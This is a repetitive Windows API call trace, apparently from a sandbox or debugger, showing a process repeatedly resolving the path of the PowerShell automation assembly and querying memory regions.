	[0161.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.826] GetLastError () returned 0x0
	[0161.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.827] GetLastError () returned 0x0
	[0161.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.828] GetLastError () returned 0x0
	[0161.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.828] GetLastError () returned 0x0
	[0161.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.828] GetLastError () returned 0x0
	[0161.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.828] GetLastError () returned 0x0
	[0161.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.828] GetLastError () returned 0x0
	[0161.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.828] GetLastError () returned 0x0
	[0161.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.828] GetLastError () returned 0x0
	[0161.829] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.829] GetLastError () returned 0x0
	[0161.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.829] GetLastError () returned 0x0
	[0161.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.829] GetLastError () returned 0x0
	[0161.829] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.830] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.830] GetLastError () returned 0x0
	[0161.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.830] GetLastError () returned 0x0
	[0161.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.830] GetLastError () returned 0x0
	[0161.830] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.830] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.831] GetLastError () returned 0x0
	[0161.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.831] GetLastError () returned 0x0
	[0161.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.831] GetLastError () returned 0x0
	[0161.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.831] GetLastError () returned 0x0
	[0161.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.831] GetLastError () returned 0x0
	[0161.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.831] GetLastError () returned 0x0
	[0161.831] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.831] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.832] GetLastError () returned 0x0
	[0161.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.832] GetLastError () returned 0x0
	[0161.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.832] GetLastError () returned 0x0
	[0161.832] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.832] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.832] GetLastError () returned 0x0
	[0161.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.832] GetLastError () returned 0x0
	[0161.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.833] GetLastError () returned 0x0
	[0161.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.833] GetLastError () returned 0x0
	[0161.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.833] GetLastError () returned 0x0
	[0161.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.833] GetLastError () returned 0x0
	[0161.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.833] GetLastError () returned 0x0
	[0161.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.833] GetLastError () returned 0x0
	[0161.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.833] GetLastError () returned 0x0
	[0161.833] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.834] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.834] GetLastError () returned 0x0
	[0161.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.834] GetLastError () returned 0x0
	[0161.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.834] GetLastError () returned 0x0
	[0161.834] VirtualQuery (in: lpAddress=0x10ceb4, lpBuffer=0x10deb4, dwLength=0x1c | out: lpBuffer=0x10deb4*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.834] VirtualQuery (in: lpAddress=0x10cef0, lpBuffer=0x10def0, dwLength=0x1c | out: lpBuffer=0x10def0*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.835] GetLastError () returned 0x0
	[0161.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.835] GetLastError () returned 0x0
	[0161.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d858, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.835] GetLastError () returned 0x0
	[0162.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.069] GetLastError () returned 0x0
	[0162.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.069] GetLastError () returned 0x0
	[0162.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.069] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
